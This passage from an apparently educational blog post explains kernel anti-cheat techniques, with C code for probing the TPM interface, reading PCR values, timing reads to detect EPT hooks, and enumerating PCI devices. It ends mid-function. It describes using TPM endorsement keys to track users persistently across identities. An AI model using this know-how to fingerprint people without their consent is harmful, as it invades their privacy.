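<p>The helper <code>TpmExtractInterfaceTypeFromCapabilityAndId</code> is not shown above. A minimal sketch of the decision it has to make could look like the following. The bit positions reflect my reading of the TCG PC Client Platform TPM Profile register layout (as mirrored in EDK2) and should be treated as assumptions; the type and function names are made up for this example.</p>

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* Illustrative result type; the names are assumptions for this sketch. */
typedef enum {
    PTP_INTERFACE_TIS  = 0,
    PTP_INTERFACE_FIFO = 1,
    PTP_INTERFACE_CRB  = 2
} ptp_interface_type;

/* Raw register values as they would be read from the TPM's MMIO window. */
typedef struct {
    uint32_t interface_id;    /* CRB Interface Identifier register */
    uint32_t fifo_capability; /* FIFO Interface Capability register */
} ptp_register_snapshot;

/* Assumed field positions inside the two registers. */
#define IFID_TYPE(x)        ((x) & 0xFu)           /* bits 3:0   */
#define IFID_VERSION(x)     (((x) >> 4) & 0xFu)    /* bits 7:4   */
#define IFID_CAP_FIFO(x)    (((x) >> 13) & 0x1u)   /* bit 13     */
#define IFID_CAP_CRB(x)     (((x) >> 14) & 0x1u)   /* bit 14     */
#define FIFO_CAP_VERSION(x) (((x) >> 28) & 0x7u)   /* bits 30:28 */

#define IFID_TYPE_FIFO   0x0u
#define IFID_TYPE_CRB    0x1u
#define IFID_VERSION_CRB 0x1u
#define FIFO_VERSION_PTP 0x3u

static ptp_interface_type classify_ptp_interface(const ptp_register_snapshot *regs)
{
    assert(regs != NULL);

    /* CRB is active, at the expected version, and advertised as supported. */
    if (IFID_TYPE(regs->interface_id) == IFID_TYPE_CRB &&
        IFID_VERSION(regs->interface_id) == IFID_VERSION_CRB &&
        IFID_CAP_CRB(regs->interface_id) != 0)
        return PTP_INTERFACE_CRB;

    /* FIFO is active, supported, and reports the PTP interface version. */
    if (IFID_TYPE(regs->interface_id) == IFID_TYPE_FIFO &&
        IFID_CAP_FIFO(regs->interface_id) != 0 &&
        FIFO_CAP_VERSION(regs->fifo_capability) == FIFO_VERSION_PTP)
        return PTP_INTERFACE_FIFO;

    /* Anything else is treated as the legacy TIS interface. */
    return PTP_INTERFACE_TIS;
}
```

<p>Keeping the classification separate from the physical memory reads makes it easy to exercise with canned register values before running it on real hardware.</p>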
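<p>The entry point below ties these checks together: it verifies platform support, confirms that the PTP registers are present, and determines the TPM interface type. As shown, it stops after logging the interface type; retrieving the TPM endorsement key, which serves as the unique hardware identifier, would be the next step over that interface.</p>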
<pre><code class="lang-c"><span class="hljs-function">NTSTATUS <span class="hljs-title">TpmExtractEndorsementKey</span><span class="hljs-params">()</span> </span>{
    NTSTATUS                status   = STATUS_UNSUCCESSFUL;
    BOOLEAN                 presence = FALSE;
    TPM2_PTP_INTERFACE_TYPE type     = {<span class="hljs-number">0</span>};

    <span class="hljs-keyword">if</span> (!TpmIsPlatformSupported())
        <span class="hljs-keyword">return</span> STATUS_NOT_SUPPORTED;

    status = TpmCheckPtpRegisterPresence(TPM20_INTEL_BASE_PHYSICAL, &amp;presence);

    <span class="hljs-keyword">if</span> (!NT_SUCCESS(status)) {
        DEBUG_ERROR(<span class="hljs-string">"TpmCheckPtpRegisterPresence: %x"</span>, status);
        <span class="hljs-keyword">return</span> status;
    }

    <span class="hljs-keyword">if</span> (!presence) {
        DEBUG_INFO(<span class="hljs-string">"TPM2.0 PTP Presence not detected."</span>);
        <span class="hljs-keyword">return</span> STATUS_UNSUCCESSFUL;
    }

    status = TpmGetPtpInterfaceType(TPM20_INTEL_BASE_PHYSICAL, &amp;type);

    <span class="hljs-keyword">if</span> (!NT_SUCCESS(status)) {
        DEBUG_ERROR(<span class="hljs-string">"TpmGetPtpInterfaceType: %x"</span>, status);
        <span class="hljs-keyword">return</span> status;
    }

    DEBUG_INFO(<span class="hljs-string">"TPM2.0 PTP Interface Type: %x"</span>, (UINT32)type);
    <span class="hljs-keyword">return</span> status;
}
</code></pre>
<p>Once the TPM endorsement key is retrieved, the anti-cheat system can use this key to create a unique profile for the device, ensuring that each device can be reliably tracked. This helps in identifying and tracking users across different gaming sessions, even if they change their network identities or reinstall the game.</p>
<p>The endorsement key can be used as part of a larger integrity check process. By combining the endorsement key with other hardware and software identifiers, the anti-cheat system can create a comprehensive profile of the system. This profile can be checked against known good states to detect any unauthorized changes or tampering, ensuring that the system has not been compromised.</p>
<p>We can do this by reading the Platform Configuration Register (PCR) value from the TPM (Trusted Platform Module) to detect if the device has been tampered with. This involves several steps: ensuring buffer size, initializing a TBS (TPM Base Services) context, preparing and sending a TPM command, checking the TPM response, extracting the PCR value, and cleaning up resources.</p>
<p>The function starts by ensuring that the provided buffer is large enough to hold the PCR value, which is 32 bytes for the SHA-256 PCR bank.</p>
<pre><code class="lang-c"><span class="hljs-function">NTSTATUS <span class="hljs-title">ReadPcrValue</span><span class="hljs-params">(UINT32 pcrIndex, BYTE* pcrValue, UINT32 pcrValueSize)</span> </span>{
    <span class="hljs-keyword">if</span> (pcrValueSize &lt; PCR_VALUE_SIZE) {
        <span class="hljs-keyword">return</span> STATUS_BUFFER_TOO_SMALL;
    }
</code></pre>
<p>Next, a TBS context is initialized. TBS is the Windows service that brokers access to the TPM, and its functions are user-mode APIs exported by <code>tbs.dll</code>, so this part belongs in the anticheat's user-mode component. The <code>TBS_CONTEXT_PARAMS2</code> structure is configured to request a TPM 2.0 context; PCR banks on TPM 2.0 devices are covered in <a target="_blank" href="https://learn.microsoft.com/en-us/windows/security/hardware-security/tpm/switch-pcr-banks-on-tpm-2-0-devices">Microsoft's documentation</a>.</p>
<pre><code class="lang-c">   TBS_HCONTEXT hContext = <span class="hljs-literal">NULL</span>;
    TBS_RESULT result;
    NTSTATUS status = STATUS_UNSUCCESSFUL;

    <span class="hljs-comment">// Initialize the TBS context</span>
    TBS_CONTEXT_PARAMS2 contextParams;
    contextParams.version = TBS_CONTEXT_VERSION_TWO;
    contextParams.asUINT32 = <span class="hljs-number">0</span>;
    contextParams.includeTpm12 = <span class="hljs-number">0</span>;
    contextParams.includeTpm20 = <span class="hljs-number">1</span>;

    result = Tbsi_Context_Create((PCTBS_CONTEXT_PARAMS)&amp;contextParams, &amp;hContext);
    <span class="hljs-keyword">if</span> (result != TBS_SUCCESS) {
        DEBUG_ERROR(<span class="hljs-string">"Tbsi_Context_Create failed with result: %x"</span>, result);
        <span class="hljs-keyword">return</span> STATUS_UNSUCCESSFUL;
    }
</code></pre>
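<p>The function then prepares the TPM command buffer. This buffer holds the TPM command to read the PCR value. The command is structured according to the TPM 2.0 specification: a 10-byte header carrying the tag, the total command size, and the command code for <code>TPM2_PCR_Read</code>, followed by a PCR selection list made of a 4-byte count and one selection entry. All multi-byte fields are big-endian.</p>
<pre><code class="lang-c"><span class="hljs-comment">// Prepare TPM command buffer</span>
    BYTE commandBuffer[<span class="hljs-number">1024</span>] = { <span class="hljs-number">0</span> };
    <span class="hljs-comment">// Header (10) + selection count (4) + one selection entry (6); assumes packed structs</span>
    UINT32 commandSize = <span class="hljs-number">20</span>;
    BYTE responseBuffer[<span class="hljs-number">1024</span>] = { <span class="hljs-number">0</span> };
    UINT32 responseSize = <span class="hljs-keyword">sizeof</span>(responseBuffer);

    <span class="hljs-comment">// pcrSelect is 3 bytes wide, so only PCR 0-23 can be addressed</span>
    <span class="hljs-keyword">if</span> (pcrIndex &gt;= <span class="hljs-number">24</span>) {
        Tbsip_Context_Close(hContext);
        <span class="hljs-keyword">return</span> STATUS_INVALID_PARAMETER;
    }

    <span class="hljs-comment">// TPM2_PCR_Read command</span>
    TPM2_COMMAND_HEADER* commandHeader = (TPM2_COMMAND_HEADER*)commandBuffer;
    commandHeader-&gt;tag = htons(TPM_ST_NO_SESSIONS);
    commandHeader-&gt;commandCode = htonl(TPM_CC_PCR_Read);
    commandHeader-&gt;commandSize = htonl(commandSize);

    <span class="hljs-comment">// The selection list starts with a big-endian count of entries</span>
    UINT32 selectionCount = htonl(<span class="hljs-number">1</span>);
    <span class="hljs-built_in">memcpy</span>(commandBuffer + <span class="hljs-keyword">sizeof</span>(TPM2_COMMAND_HEADER), &amp;selectionCount, <span class="hljs-keyword">sizeof</span>(selectionCount));

    TPM2_PCR_SELECTION* pcrSelection = (TPM2_PCR_SELECTION*)(commandBuffer + <span class="hljs-keyword">sizeof</span>(TPM2_COMMAND_HEADER) + <span class="hljs-keyword">sizeof</span>(selectionCount));
    pcrSelection-&gt;hash = htons(TPM_ALG_SHA256);
    pcrSelection-&gt;sizeOfSelect = <span class="hljs-number">3</span>;
    <span class="hljs-built_in">memset</span>(pcrSelection-&gt;pcrSelect, <span class="hljs-number">0</span>, <span class="hljs-number">3</span>);
    pcrSelection-&gt;pcrSelect[pcrIndex / <span class="hljs-number">8</span>] = (BYTE)(<span class="hljs-number">1</span> &lt;&lt; (pcrIndex % <span class="hljs-number">8</span>));
</code></pre>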
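<p>To make the wire format concrete, the following user-mode sketch serializes a <code>TPM2_PCR_Read</code> command for a single SHA-256 PCR byte by byte, without relying on struct packing. The constant values come from the TPM 2.0 specification; the helper names (<code>put_be16</code>, <code>put_be32</code>, <code>build_pcr_read_command</code>) are hypothetical.</p>

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>
#include <string.h>

#define TPM_ST_NO_SESSIONS 0x8001u
#define TPM_CC_PCR_READ    0x0000017Eu
#define TPM_ALG_SHA256     0x000Bu
#define PCR_READ_CMD_SIZE  20u /* 10-byte header + 4-byte count + 6-byte selection */

/* Store big-endian integers, the byte order the TPM expects on the wire. */
static void put_be16(uint8_t *p, uint16_t v)
{
    p[0] = (uint8_t)(v >> 8);
    p[1] = (uint8_t)v;
}

static void put_be32(uint8_t *p, uint32_t v)
{
    p[0] = (uint8_t)(v >> 24);
    p[1] = (uint8_t)(v >> 16);
    p[2] = (uint8_t)(v >> 8);
    p[3] = (uint8_t)v;
}

/* Hypothetical helper: serialize TPM2_PCR_Read for one SHA-256 PCR.
 * Returns the command length, or 0 if the arguments are unusable. */
static size_t build_pcr_read_command(uint32_t pcr_index, uint8_t *out, size_t out_size)
{
    assert(out != NULL);

    /* A 3-byte select bitmap covers PCR 0 through 23. */
    if (pcr_index >= 24 || out_size < PCR_READ_CMD_SIZE)
        return 0;

    memset(out, 0, PCR_READ_CMD_SIZE);
    put_be16(out + 0, TPM_ST_NO_SESSIONS);  /* tag */
    put_be32(out + 2, PCR_READ_CMD_SIZE);   /* commandSize */
    put_be32(out + 6, TPM_CC_PCR_READ);     /* commandCode */
    put_be32(out + 10, 1);                  /* TPML_PCR_SELECTION.count */
    put_be16(out + 14, TPM_ALG_SHA256);     /* TPMS_PCR_SELECTION.hash */
    out[16] = 3;                            /* sizeofSelect */
    out[17 + pcr_index / 8] = (uint8_t)(1u << (pcr_index % 8));
    return PCR_READ_CMD_SIZE;
}
```

<p>The returned length is the value that should be passed as the command size when submitting the buffer, rather than the size of the whole scratch buffer.</p>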
<p>The command is then sent to the TPM using the <code>Tbsip_Submit_Command</code> function. This function handles the low-level communication with the TPM, sending the command buffer and receiving the response buffer.</p>
<pre><code class="lang-c">    <span class="hljs-comment">// Send the TPM command</span>
    result = Tbsip_Submit_Command(hContext, TBS_COMMAND_LOCALITY_ZERO, TBS_COMMAND_PRIORITY_NORMAL, commandBuffer, commandSize, responseBuffer, &amp;responseSize);
    <span class="hljs-keyword">if</span> (result != TBS_SUCCESS) {
        DEBUG_ERROR(<span class="hljs-string">"Tbsip_Submit_Command failed with result: %x"</span>, result);
        Tbsip_Context_Close(hContext);
        <span class="hljs-keyword">return</span> STATUS_UNSUCCESSFUL;
    }
</code></pre>
<p>Upon receiving the response, the function checks the TPM response header to ensure that the command was processed successfully. The response header contains the status of the TPM command.</p>
<pre><code class="lang-c">    <span class="hljs-comment">// Check the TPM response</span>
    TPM2_RESPONSE_HEADER* responseHeader = (TPM2_RESPONSE_HEADER*)responseBuffer;
    <span class="hljs-keyword">if</span> (ntohs(responseHeader-&gt;tag) != TPM_ST_NO_SESSIONS || ntohl(responseHeader-&gt;responseCode) != TPM_RC_SUCCESS) {
        DEBUG_ERROR(<span class="hljs-string">"TPM command failed with response code: %x"</span>, ntohl(responseHeader-&gt;responseCode));
        Tbsip_Context_Close(hContext);
        <span class="hljs-keyword">return</span> STATUS_UNSUCCESSFUL;
    }
</code></pre>
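<p>If the TPM command was successful, the function extracts the PCR value from the response buffer. After the response header come a 4-byte update counter, the echoed PCR selection (a 4-byte count plus a 6-byte entry), a 4-byte digest count, and a 2-byte digest size, so the digest itself starts 20 bytes past the header. The function copies it into the provided buffer, closes the TBS context, and returns.</p>
<pre><code class="lang-c">    <span class="hljs-comment">// Extract the PCR value</span>
    <span class="hljs-comment">// Skip pcrUpdateCounter (4), the PCR selection (4 + 6), the digest count (4) and the digest size (2);</span>
    <span class="hljs-comment">// assumes TPM2_RESPONSE_HEADER is the packed 10-byte header</span>
    BYTE* pcrValues = responseBuffer + <span class="hljs-keyword">sizeof</span>(TPM2_RESPONSE_HEADER) + <span class="hljs-number">20</span>;
    <span class="hljs-built_in">memcpy</span>(pcrValue, pcrValues, PCR_VALUE_SIZE);

    <span class="hljs-comment">// Clean up and report success</span>
    Tbsip_Context_Close(hContext);
    <span class="hljs-keyword">return</span> STATUS_SUCCESS;
}
</code></pre>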
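<p>The fixed offset used above only holds when exactly one selection with a 3-byte bitmap comes back. A more defensive parser walks the response fields instead. The sketch below does that on a plain byte buffer; the layout follows the <code>TPM2_PCR_Read</code> response in the TPM 2.0 specification, while the function name and return convention are assumptions made for this example.</p>

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>
#include <string.h>

#define TPM_RC_SUCCESS     0u
#define SHA256_DIGEST_SIZE 32u

static uint16_t get_be16(const uint8_t *p)
{
    return (uint16_t)((p[0] << 8) | p[1]);
}

static uint32_t get_be32(const uint8_t *p)
{
    return ((uint32_t)p[0] << 24) | ((uint32_t)p[1] << 16) |
           ((uint32_t)p[2] << 8) | (uint32_t)p[3];
}

/* Hypothetical helper: copy the first SHA-256 digest out of a
 * TPM2_PCR_Read response. Returns 0 on success, -1 if malformed. */
static int parse_pcr_read_response(const uint8_t *rsp, size_t rsp_len,
                                   uint8_t digest[SHA256_DIGEST_SIZE])
{
    size_t off = 10; /* tag (2) + responseSize (4) + responseCode (4) */

    assert(rsp != NULL && digest != NULL);
    if (rsp_len < off || get_be32(rsp + 2) > rsp_len ||
        get_be32(rsp + 6) != TPM_RC_SUCCESS)
        return -1;

    off += 4; /* pcrUpdateCounter */
    if (off + 4 > rsp_len)
        return -1;
    uint32_t selections = get_be32(rsp + off);
    off += 4;

    /* Skip each echoed selection: hash (2) + sizeofSelect (1) + bitmap. */
    for (uint32_t i = 0; i < selections; i++) {
        if (off + 3 > rsp_len)
            return -1;
        off += 3u + rsp[off + 2];
    }

    /* Digest list: count (4), then size-prefixed digests. */
    if (off + 6 > rsp_len || get_be32(rsp + off) < 1)
        return -1;
    off += 4;
    if (get_be16(rsp + off) != SHA256_DIGEST_SIZE)
        return -1;
    off += 2;
    if (off + SHA256_DIGEST_SIZE > rsp_len)
        return -1;

    memcpy(digest, rsp + off, SHA256_DIGEST_SIZE);
    return 0;
}
```

<p>Checking every length before advancing keeps a truncated or unexpected response from being copied into the caller's buffer as if it were a valid PCR value.</p>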
<p>With this, the anticheat can detect any unauthorized changes to the system's firmware, bootloader, or other critical components, thereby ensuring the integrity of the device.</p>
<h2 id="heading-ept-hook-detection-for-hypervisor-fingerprinting">EPT Hook Detection for Hypervisor Fingerprinting</h2>
<p>EPT (Extended Page Tables) hook detection is a technique used to identify hidden hypervisors or virtualization-based rootkits that manipulate memory access through EPT. This feature, part of Intel VT-x technology, allows a hypervisor to control guest physical address translation, enabling efficient virtualization but also providing a potential vector for malicious activity.</p>
<p>EPT hooks can monitor and modify memory accesses stealthily, making traditional anti-cheat mechanisms ineffective. To counter this, EPT hook detection involves measuring read latencies to identify anomalies indicative of EPT manipulation.</p>
<p>First, we can retrieve and store the addresses of both control functions and protected functions. Control functions serve as a baseline for normal read times, while protected functions are commonly targeted by EPT hooks.</p>
<pre><code class="lang-c"><span class="hljs-function">STATIC
NTSTATUS
<span class="hljs-title">InitiateEptFunctionAddressArrays</span><span class="hljs-params">()</span>
</span>{
    PAGED_CODE();

    UNICODE_STRING current_function;

    <span class="hljs-keyword">for</span> (INT index = <span class="hljs-number">0</span>; index &lt; EPT_CONTROL_FUNCTIONS_COUNT; index++) {
        ImpRtlInitUnicodeString(&amp;current_function, CONTROL_FUNCTIONS[index]);
        CONTROL_FUNCTION_ADDRESSES[index] =
            ImpMmGetSystemRoutineAddress(&amp;current_function);

        <span class="hljs-keyword">if</span> (!CONTROL_FUNCTION_ADDRESSES[index])
            <span class="hljs-keyword">return</span> STATUS_UNSUCCESSFUL;
    }

    <span class="hljs-keyword">for</span> (INT index = <span class="hljs-number">0</span>; index &lt; EPT_PROTECTED_FUNCTIONS_COUNT; index++) {
        ImpRtlInitUnicodeString(&amp;current_function, PROTECTED_FUNCTIONS[index]);
        PROTECTED_FUNCTION_ADDRESSES[index] =
            ImpMmGetSystemRoutineAddress(&amp;current_function);

        <span class="hljs-keyword">if</span> (!PROTECTED_FUNCTION_ADDRESSES[index])
            <span class="hljs-keyword">return</span> STATUS_UNSUCCESSFUL;
    }

    <span class="hljs-keyword">return</span> STATUS_SUCCESS;
}
</code></pre>
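<p>The average read times of control functions are measured to establish a baseline. This is done by reading the bytes at each function's address multiple times, at <code>HIGH_LEVEL</code> IRQL with interrupts disabled so that scheduling noise does not skew the result, and averaging the time taken. The initial call to <code>MeasureInstructionRead</code>, whose result is discarded, presumably serves to warm the cache before the timed loop.</p>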
<pre><code class="lang-c"><span class="hljs-function">STATIC
UINT64
<span class="hljs-title">MeasureReads</span><span class="hljs-params">(_In_ PVOID Address, _In_ ULONG Count)</span>
</span>{
    UINT64 read_average = <span class="hljs-number">0</span>;
    KIRQL  irql         = {<span class="hljs-number">0</span>};

    MeasureInstructionRead(Address);

    KeRaiseIrql(HIGH_LEVEL, &amp;irql);
    _disable();

    <span class="hljs-keyword">for</span> (ULONG iteration = <span class="hljs-number">0</span>; iteration &lt; Count; iteration++)
        read_average += MeasureInstructionRead(Address);

    _enable();
    KeLowerIrql(irql);

    <span class="hljs-keyword">return</span> read_average / Count;
}

<span class="hljs-function">STATIC
NTSTATUS
<span class="hljs-title">GetAverageReadTimeAtRoutine</span><span class="hljs-params">(_In_ PVOID    RoutineAddress,
                            _Out_ PUINT64 AverageTime)</span>
</span>{
    <span class="hljs-keyword">if</span> (!RoutineAddress || !AverageTime)
        <span class="hljs-keyword">return</span> STATUS_UNSUCCESSFUL;

    <span class="hljs-keyword">if</span> (!MmIsAddressValid(RoutineAddress))
        <span class="hljs-keyword">return</span> STATUS_INVALID_ADDRESS;

    *AverageTime = MeasureReads(RoutineAddress, EPT_CHECK_NUM_ITERATIONS);

    <span class="hljs-keyword">return</span> *AverageTime == <span class="hljs-number">0</span> ? STATUS_UNSUCCESSFUL : STATUS_SUCCESS;
}
</code></pre>
<p>The read times of protected functions are measured in the same way as control functions. These times are then compared to the baseline read times of the control functions.</p>
<pre><code class="lang-c"><span class="hljs-function">NTSTATUS
<span class="hljs-title">DetectEptHooksInKeyFunctions</span><span class="hljs-params">()</span>
</span>{
    PAGED_CODE();

    NTSTATUS status           = STATUS_UNSUCCESSFUL;
    UINT32   control_fails    = <span class="hljs-number">0</span>;
    UINT64   instruction_time = <span class="hljs-number">0</span>;
    UINT64   control_time_sum = <span class="hljs-number">0</span>;
    UINT64   control_average  = <span class="hljs-number">0</span>;

    status = InitiateEptFunctionAddressArrays();

    <span class="hljs-keyword">if</span> (!NT_SUCCESS(status)) {
        <span class="hljs-keyword">return</span> status;
    }

    <span class="hljs-keyword">for</span> (INT index = <span class="hljs-number">0</span>; index &lt; EPT_CONTROL_FUNCTIONS_COUNT; index++) {
        status = GetAverageReadTimeAtRoutine(CONTROL_FUNCTION_ADDRESSES[index],
                                             &amp;instruction_time);

        <span class="hljs-keyword">if</span> (!NT_SUCCESS(status)) {
            control_fails += <span class="hljs-number">1</span>;
            <span class="hljs-keyword">continue</span>;
        }

        control_time_sum += instruction_time;
    }

    <span class="hljs-keyword">if</span> (control_time_sum == <span class="hljs-number">0</span>)
        <span class="hljs-keyword">return</span> STATUS_UNSUCCESSFUL;

    control_average =
        control_time_sum / (EPT_CONTROL_FUNCTIONS_COUNT - control_fails);

    <span class="hljs-keyword">if</span> (control_average == <span class="hljs-number">0</span>)
        <span class="hljs-keyword">return</span> STATUS_UNSUCCESSFUL;

    <span class="hljs-keyword">for</span> (INT index = <span class="hljs-number">0</span>; index &lt; EPT_PROTECTED_FUNCTIONS_COUNT; index++) {
        status = GetAverageReadTimeAtRoutine(
            PROTECTED_FUNCTION_ADDRESSES[index], &amp;instruction_time);

        <span class="hljs-keyword">if</span> (!NT_SUCCESS(status)) {
            <span class="hljs-keyword">continue</span>;
        }

        <span class="hljs-keyword">if</span> (control_average * EPT_EXECUTION_TIME_MULTIPLIER &lt;
            instruction_time) {
            DEBUG_WARNING(
                <span class="hljs-string">"EPT hook detected at function: %llx with execution time of: %llx"</span>,
                PROTECTED_FUNCTION_ADDRESSES[index],
                instruction_time);
        }
    }

    <span class="hljs-keyword">return</span> status;
}
</code></pre>
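<p>If the read time for a protected function exceeds the baseline by more than a factor of <code>EPT_EXECUTION_TIME_MULTIPLIER</code>, the read most likely triggered an EPT violation that a hypervisor had to service. That suggests an EPT hook is present, which in turn is a strong indicator of a hypervisor.</p>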
<pre><code class="lang-c"><span class="hljs-keyword">if</span> (control_average * EPT_EXECUTION_TIME_MULTIPLIER &lt; instruction_time) {
    DEBUG_WARNING(
        <span class="hljs-string">"EPT hook detected at function: %llx with execution time of: %llx"</span>,
        PROTECTED_FUNCTION_ADDRESSES[index],
        instruction_time);
}
</code></pre>
<p>By measuring and comparing the read times, the detection mechanism can identify the additional latency introduced by EPT hooks. Since EPT hooks are typically used by hypervisors, detecting these hooks can effectively indicate the presence of a hypervisor.</p>
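<p>The arithmetic behind that decision is easy to check in isolation. The sketch below reproduces it on plain arrays of cycle counts; the function names are hypothetical, and any numbers fed to it are made-up inputs rather than measurements.</p>

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* Average the control timings, skipping zero entries, which stand in
 * for measurements that failed. Returns 0 if nothing usable remains. */
static uint64_t control_baseline(const uint64_t *control_cycles, size_t count)
{
    uint64_t sum = 0;
    size_t valid = 0;

    assert(control_cycles != NULL);
    for (size_t i = 0; i < count; i++) {
        if (control_cycles[i] == 0)
            continue;
        sum += control_cycles[i];
        valid++;
    }
    return valid ? sum / valid : 0;
}

/* Flag a protected routine whose read time exceeds baseline * multiplier.
 * Returns 1 when flagged, 0 otherwise (including when no baseline exists). */
static int looks_ept_hooked(uint64_t baseline, uint64_t protected_cycles,
                            uint64_t multiplier)
{
    if (baseline == 0)
        return 0;
    return protected_cycles > baseline * multiplier;
}
```

<p>With control reads averaging 40 cycles and a multiplier of 10, a protected read would need to take more than 400 cycles to be flagged. A VM exit typically costs far more than an ordinary read, which is what gives the check its margin.</p>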
<h2 id="heading-malicious-pci-device-detection">Malicious PCI Device Detection</h2>
<p>Detecting malicious PCI devices is crucial in the context of kernel-level anti-cheats for several reasons. PCI devices operate at a low level within the computer's architecture, providing direct access to the system's memory and hardware, which allows malicious devices to execute arbitrary code and manipulate system operations in ways that are difficult to detect and counteract from higher levels of the operating system. A malicious PCI device can intercept, alter, or inject <a target="_blank" href="https://astralvx.com/dma-explained/">malicious code directly into the system memory</a>.</p>
<p>Anticheat systems usually perform malicious PCI device detection by scanning the configuration space of PCI devices. Every PCI device has a set of registers commonly referred to as the PCI configuration space. Modern PCIe devices implement an extended configuration space that is mapped into the physical address space, allowing the system to read and write the registers with ordinary memory accesses. The configuration space starts with a standard header containing information such as the VendorID, DeviceID, Command, Status, and other details.</p>
<p>This configuration space allows querying important information from PCI devices within the device tree using the <code>IRP_MN_READ_CONFIG</code> code, which reads from a PCI device's configuration space.</p>
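<p>As a quick illustration of that header, the sketch below pulls the first four 16-bit fields out of a raw configuration space dump. The offsets and little-endian encoding are defined by the PCI specification; the struct and function names are hypothetical.</p>

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* The first four fields of the standard PCI configuration header. */
typedef struct {
    uint16_t vendor_id; /* offset 0x00 */
    uint16_t device_id; /* offset 0x02 */
    uint16_t command;   /* offset 0x04 */
    uint16_t status;    /* offset 0x06 */
} pci_header_ids;

/* Configuration space fields are little-endian. */
static uint16_t get_le16(const uint8_t *p)
{
    return (uint16_t)(p[0] | (p[1] << 8));
}

/* Hypothetical helper: decode the identifying fields from a raw dump.
 * Returns 0 on success, -1 if the dump is too short or no device answered. */
static int parse_pci_header(const uint8_t *cfg, size_t len, pci_header_ids *out)
{
    assert(cfg != NULL && out != NULL);
    if (len < 8)
        return -1;

    out->vendor_id = get_le16(cfg + 0);
    out->device_id = get_le16(cfg + 2);
    out->command   = get_le16(cfg + 4);
    out->status    = get_le16(cfg + 6);

    /* A vendor ID of 0xFFFF means nothing responded at this address. */
    return out->vendor_id == 0xFFFF ? -1 : 0;
}
```

<p>In the driver these fields come back already decoded in a <code>PCI_COMMON_HEADER</code>, so a helper like this is mainly useful for offline analysis of captured dumps.</p>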
<p>We can first start by enumerating all PCI device objects in the system.</p>
<pre><code class="lang-c"><span class="hljs-function">NTSTATUS
<span class="hljs-title">ValidatePciDevices</span><span class="hljs-params">()</span>
</span>{
    NTSTATUS status = STATUS_UNSUCCESSFUL;

    status = EnumeratePciDeviceObjects(PciDeviceQueryCallback, <span class="hljs-literal">NULL</span>);

    <span class="hljs-keyword">if</span> (!NT_SUCCESS(status))
        DEBUG_ERROR(<span class="hljs-string">"EnumeratePciDeviceObjects failed with status %x"</span>, status);

    <span class="hljs-keyword">return</span> status;
}
</code></pre>
<p>Windows device objects fall into two main categories: Physical Device Objects (PDOs) and Functional Device Objects (FDOs). A PDO is created by a bus driver for each device it enumerates on its bus and has an associated DEVICE_NODE, while an FDO is created by the function driver and represents the functionality of the device, defining how the system interacts with it. Each device stack has exactly one PDO and one FDO, plus optional filter device objects. Because <code>pci.sys</code> is the bus driver for PCI, it owns a PDO for every PCI device, so enumerating the device objects that belong to the <code>pci.sys</code> driver object reaches every PCI device on the system.</p>
<p>The enumeration routine first retrieves the driver object associated with the PCI driver (<code>pci.sys</code>). It then enumerates all device objects managed by this driver, storing them in an array. For each device object, it checks whether the object is a valid PDO by calling the <code>IsDeviceObjectValidPdo</code> function. If it is, the callback routine (<code>PciDeviceQueryCallback</code>) is invoked.</p>
<pre><code class="lang-c"><span class="hljs-function">NTSTATUS
<span class="hljs-title">EnumeratePciDeviceObjects</span><span class="hljs-params">(_In_ PCI_DEVICE_CALLBACK CallbackRoutine,
                          _In_opt_ PVOID           Context)</span>
</span>{
    NTSTATUS        status             = STATUS_UNSUCCESSFUL;
    UNICODE_STRING  pci                = RTL_CONSTANT_STRING(<span class="hljs-string">L"\\Driver\\pci"</span>);
    PDRIVER_OBJECT  pci_driver_object  = <span class="hljs-literal">NULL</span>;
    PDEVICE_OBJECT* pci_device_objects = <span class="hljs-literal">NULL</span>;
    PDEVICE_OBJECT  current_device     = <span class="hljs-literal">NULL</span>;
    UINT32          pci_device_objects_count = <span class="hljs-number">0</span>;

    status = GetDriverObjectByDriverName(&amp;pci, &amp;pci_driver_object);

    <span class="hljs-keyword">if</span> (!NT_SUCCESS(status)) {
        DEBUG_ERROR(<span class="hljs-string">"GetDriverObjectByDriverName failed with status %x"</span>,
                    status);
        <span class="hljs-keyword">return</span> status;
    }

    status = EnumerateDriverObjectDeviceObjects(
        pci_driver_object, &amp;pci_device_objects, &amp;pci_device_objects_count);

    <span class="hljs-keyword">if</span> (!NT_SUCCESS(status)) {
        DEBUG_ERROR(<span class="hljs-string">"EnumerateDriverObjectDeviceObjects failed with status %x"</span>,
                    status);
        <span class="hljs-keyword">return</span> status;
    }

    <span class="hljs-keyword">for</span> (UINT32 index = <span class="hljs-number">0</span>; index &lt; pci_device_objects_count; index++) {
        current_device = pci_device_objects[index];

        <span class="hljs-comment">/* make sure we have a valid PDO */</span>
        <span class="hljs-keyword">if</span> (!IsDeviceObjectValidPdo(current_device)) {
            ObDereferenceObject(current_device);
            <span class="hljs-keyword">continue</span>;
        }

        status = CallbackRoutine(current_device, Context);

        <span class="hljs-keyword">if</span> (!NT_SUCCESS(status))
            DEBUG_ERROR(
                <span class="hljs-string">"EnumeratePciDeviceObjects CallbackRoutine failed with status %x"</span>,
                status);

        ObDereferenceObject(current_device);
    }

    <span class="hljs-keyword">if</span> (pci_device_objects)
        ExFreePoolWithTag(pci_device_objects, POOL_TAG_HW);

    <span class="hljs-keyword">return</span> status;
}
</code></pre>
<p>The callback reads the device's configuration space, starting from <code>PCI_VENDOR_ID_OFFSET</code>, into a <code>PCI_COMMON_HEADER</code> structure and checks the result against the list of flagged devices. The read itself is performed with an IRP that uses the <code>IRP_MN_READ_CONFIG</code> minor code.</p>
<pre><code class="lang-c"><span class="hljs-function">STATIC
NTSTATUS
<span class="hljs-title">PciDeviceQueryCallback</span><span class="hljs-params">(_In_ PDEVICE_OBJECT DeviceObject, _In_opt_ PVOID Context)</span>
</span>{
    UNREFERENCED_PARAMETER(Context);

    NTSTATUS          status = STATUS_UNSUCCESSFUL;
    PCI_COMMON_HEADER header = {<span class="hljs-number">0</span>};

    status = QueryPciDeviceConfigurationSpace(
        DeviceObject, PCI_VENDOR_ID_OFFSET, &amp;header, <span class="hljs-keyword">sizeof</span>(PCI_COMMON_HEADER));

    <span class="hljs-keyword">if</span> (!NT_SUCCESS(status)) {
        DEBUG_ERROR(<span class="hljs-string">"QueryPciDeviceConfigurationSpace failed with status %x"</span>,
                    status);
